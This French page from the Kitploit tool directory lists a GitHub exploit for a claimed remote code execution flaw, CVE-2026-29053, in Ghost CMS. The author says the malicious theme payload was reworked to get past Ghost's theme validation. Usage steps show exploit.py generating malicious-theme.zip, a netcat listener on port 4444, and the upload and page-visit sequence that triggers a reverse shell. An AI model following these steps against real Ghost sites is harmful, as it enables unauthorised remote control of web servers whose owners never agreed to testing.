Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-29053 — Vulnérabilité (RCE) découverte dans Ghost CMS (affectant spécifiquement les versions 0.7.2 à 6.19.0) | Kitploit
Outils/GitHubGitHub/ac8999/cve-2026-29053
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubac8999/cve-2026-29053

CVE-2026-29053

Vulnérabilité (RCE) découverte dans Ghost CMS (affectant spécifiquement les versions 0.7.2 à 6.19.0)

Voir le dépôt
11il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Ceci est une refonte du dépôt de rootxran pour cette même CVE - https://github.com/rootxran/CVE-2026-29053

Lors des tests sur certains environnements Ghost CMS, le thème payload d'origine déclenchait une erreur fatale Handlebars. Le CMS ne parvenait pas à activer le thème malveillant car il référençait un helper obsolète ou manquant (social_url) dans le fichier author.hbs.

J'ai mis à jour les templates Handlebars pour utiliser des helpers natifs et compatibles. Cela garantit que le thème passe les contrôles de validation internes de Ghost, permettant à l'exploit de s'activer avec succès sans être bloqué par l'analyseur de sécurité du moteur de thème.

Utilisation : (référez-vous à l'exploit d'origine pour la vidéo de démonstration).

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/
Télécharger l’outil